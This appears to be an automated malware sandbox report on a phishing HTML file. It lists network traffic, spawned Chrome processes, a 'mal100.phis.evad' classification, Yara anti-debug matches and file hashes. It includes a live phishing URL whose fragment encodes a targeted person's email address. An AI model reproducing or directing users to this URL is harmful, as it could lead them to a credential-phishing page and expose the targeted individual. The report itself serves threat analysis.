Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 00:55:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: cloudflareCf-Cache-Status: DYNAMICVary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mwne5Su0y4ydr3uvn8IB7xuZVHCJ4bDJwK8gNKRjquTOMlycWxWu52tlazPnn8KDmta7S8lNFt4ezqatZ5FvrjBHqx%2F0AasoEi%2FpHaNsGwwFCJ%2BfyzHwHlf3L11G"}],"group":"cf-nel","max_age":604800}Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server-Timing: cfL4;desc="?proto=TCP&rtt=25562&min_rtt=25552&rtt_var=9602&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2068&delivery_rate=111111&cwnd=32&unsent_bytes=0&cid=f8e3b3bd6f9ca9b4&ts=209&x=0"CF-RAY: 9220c461180433d5-EWRalt-svc: h3=":443"; ma=86400

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49679 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49696 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.16:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.16:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.16:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.68:443 -> 192.168.2.16:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.46:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.46:443 -> 192.168.2.16:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.148.69:443 -> 192.168.2.16:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.16:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.33.187.68:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.33.187.68:443 -> 192.168.2.16:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.16:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.33.187.96:443 -> 192.168.2.16:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.100:443 -> 192.168.2.16:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.70.233:443 -> 192.168.2.16:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.16:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.51.122:443 -> 192.168.2.16:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.46:443 -> 192.168.2.16:49794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49832 version: TLS 1.2

Creates files inside the system directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\scoped_dir6908_227045112

Deletes files inside the Windows folder

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir6908_227045112

Source: classification engine

Classification label: mal100.phis.evad.winHTML@20/33@49/232

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\Google\Chrome\Application\Dictionaries

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\suspect.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1892,i,9613019893938489976,16158350470171388402,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2264 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1892,i,9613019893938489976,16158350470171388402,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2264 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries

Data Obfuscation

HTML file submission requesting Cloudflare captcha challenge

Source: https://3pz.bughtswo.com/admi/#YnJhZC5nYWxlQHdpbHNvbnNhZHZpc29yeS5jb20uYXU=

HTTP Parser: https://3pz.bughtswo.com/admi/#YnJhZC5nYWxlQHdpbHNvbnNhZHZpc29yeS5jb20uYXU=

Malware Analysis System Evasion

Yara detected AntiDebug via timestamp check

Source: Yara match	File source: 0.2.d.script.csv, type: HTML
Source: Yara match	File source: 1.11..script.csv, type: HTML
Source: Yara match	File source: 1.12..script.csv, type: HTML
Source: Yara match	File source: 1.3.pages.csv, type: HTML
Source: Yara match	File source: 1.4.pages.csv, type: HTML
Source: Yara match	File source: 2.22.d.script.csv, type: HTML
Source: Yara match	File source: 3.29..script.csv, type: HTML
Source: Yara match	File source: 3.30..script.csv, type: HTML
Source: Yara match	File source: 3.9.pages.csv, type: HTML

ID:	1641093
Product:	CloudBasic
Start time:	01:54:08
Start date:	18.03.2025
Sample:	suspect.html
Cookbook:	defaultwindowsinteractivecookbook.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	f5e6efad87e2133a94def99abe16d5eb
SHA1:	6ec0edf8eadf07db4689b88ffd5d02fa5acf3b55
SHA256:	0ccb860546987aa19ef992a8002cb46a13cd87c1e008419165bbce48d7e630cb
Filetype:	HyperText Markup Language (12001/1) 29.26%

Name	Type	MD5	SHA1	SHA256
Chrome Cache Entry: 104	very short file (no magic)	CFCD208495D565EF66E7DFF9F98764DA	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
Chrome Cache Entry: 106	RIFF (little-endian) data, Web/P image	32CA2081553E969F9FDD4374134521AD	7B09924C4C3D8B6E41FE38363E342DA098BE4173	216FC342A469AA6A005B2EACC24622095E5282D3E9F1AE99CE54C27B92EC3587
Chrome Cache Entry: 107	SVG Scalable Vector Graphics image	FE87496CC7A44412F7893A72099C120A	A0C1458C08A815DF63D3CB0406D60BE6607CA699	55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
Chrome Cache Entry: 109	Unicode text, UTF-8 text, with very long lines (21720), with CRLF line terminators	E34A613844E71AD9EA25A2FAAB768F3F	34844596642BED7752C4AED44721CEE52593B344	D767A16A68A568D204E0E4283BDDB8A9702CCF95BF2715D512C4AE39C3D79AB5
Chrome Cache Entry: 110	ASCII text, with CRLF line terminators	38501E3FBBBD89B56AA5BA35DE1A32FE	D9B31981B6F834E8480BA28FBC1CFF1BE772F589	A1CA6B381CB01968851C98512C6E7F6C5309A49F7A16B864813135CBFF82A85B
Chrome Cache Entry: 111	RIFF (little-endian) data, Web/P image	41D62CA205D54A78E4298367482B4E2B	839AAE21ED8ECFC238FDC68B93CCB27431CD5393	20A4A780DB0BCC047015A0D8037EB4EB58B3E5CB338673799C030A3E1B626B40
Chrome Cache Entry: 112	HTML document, ASCII text, with very long lines (11993), with CRLF line terminators	0FA03A3FD695C7771CA21CCE7F3627A2	A318C4783EB50BB045B27E716F24EEF60D0B7A27	F6CBE0E7955A375AAB5453F93F24D7119DF348EE324F5B9C3091A756753EF945
Chrome Cache Entry: 113	SVG Scalable Vector Graphics image	59759B80E24A89C8CD029B14700E646D	651B1921C99E143D3C242DE3FAACFB9AD51DBB53	B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
Chrome Cache Entry: 114	Web Open Font Format (Version 2), TrueType, length 28000, version 1.66	A4BCA6C95FED0D0C5CC46CF07710DCEC	73B56E33B82B42921DB8702A33EFD0F2B2EC9794	5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
Chrome Cache Entry: 116	ASCII text, with no line terminators	D90F02F133E7B82AF89B3E58526AC459	F1D6D47EFE0D920F5BC5024E813554BD2F8A1650	FCF0826E3EA7D24F6C73417BFF62AD84191ECC837DBFB10E60A2547580C3C14D
Chrome Cache Entry: 119	RIFF (little-endian) data, Web/P image	4B52ECDC33382C9DCA874F551990E704	8F3BF8E41CD4CDDDB17836B261E73F827B84341B	CCE050CC3B150C0B370751021BB15018EE2B64AC369E230FE3B571A9B00D4342
Chrome Cache Entry: 120	RIFF (little-endian) data, Web/P image	541B83C2195088043337E4353B6FD60D	F09630596B6713217984785A64F6EA83E91B49C5	2658B8874F0D2A12E8726DF78AC8954324C3BBE4695E66BDEF89195FDE64322F
Chrome Cache Entry: 122	ASCII text, with very long lines (48316), with no line terminators	2CA03AD87885AB983541092B87ADB299	1A17F60BF776A8C468A185C1E8E985C41A50DC27	8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
Chrome Cache Entry: 123	PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced	12BDACC832185D0367ECC23FD24C86CE	4422F316EB4D8C8D160312BB695FD1D944CBFF12	877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
Chrome Cache Entry: 126	Web Open Font Format (Version 2), TrueType, length 43596, version 1.0	2A05E9E5572ABC320B2B7EA38A70DCC1	D5FA2A856D5632C2469E42436159375117EF3C35	3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
Chrome Cache Entry: 138	HTML document, ASCII text, with very long lines (52007), with CRLF line terminators	C30ED6AB59EA4F214BA7F6BDBD965172	C6AB96AA934DEC30DB530B1D24A1B7808F82993F	9E2A9E4E0621DDF7CFD97151E59A1D7B0DBC60373ED0B532758EC2B7412547F8
Chrome Cache Entry: 140	ASCII text, with very long lines (48238)	184E29DE57C67BC329C650F294847C16	961208535893142386BA3EFE1444B4F8A90282C3	DD03BA1DD6D73643A8ED55F4CEBC059D673046975D106D26D245326178C2EB9D
Chrome Cache Entry: 141	SVG Scalable Vector Graphics image	40EB39126300B56BF66C20EE75B54093	83678D94097257EB474713DEC49E8094F49D2E2A	765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
Chrome Cache Entry: 142	SVG Scalable Vector Graphics image	B59C16CA9BF156438A8A96D45E33DB64	4E51B7D3477414B220F688ADABD76D3AE6472EE3	A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
Chrome Cache Entry: 143	Web Open Font Format, TrueType, length 36696, version 1.0	A69E9AB8AFDD7486EC0749C551051FF2	C34E6AA327B536FB48D1FE03577A47C7EE2231B8	FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
Chrome Cache Entry: 147	ASCII text, with very long lines (51734)	0329C939FCA7C78756B94FBCD95E322B	7B5499B46660A0348CC2B22CAE927DCC3FDA8B20	0E47F4D2AF98BFE77921113C8AAF0C53614F88FF14FF819BE6612538611ED3D1
Chrome Cache Entry: 148	Web Open Font Format, TrueType, length 35970, version 1.0	496B7BBDE91C7DC7CF9BBABBB3921DA8	2BD3C406A715AB52DAD84C803C55BF4A6E66A924	AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
Chrome Cache Entry: 151	Web Open Font Format (Version 2), TrueType, length 93276, version 1.0	BCD7983EA5AA57C55F6758B4977983CB	EF3A009E205229E07FB0EC8569E669B11C378EF1	6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
Chrome Cache Entry: 80	Web Open Font Format (Version 2), TrueType, length 28584, version 1.66	17081510F3A6F2F619EC8C6F244523C7	87F34B2A1532C50F2A424C345D03FE028DB35635	2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
Chrome Cache Entry: 82	SVG Scalable Vector Graphics image	BC3D32A696895F78C19DF6C717586A5D	9191CB156A30A3ED79C44C0A16C95159E8FF689D	0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
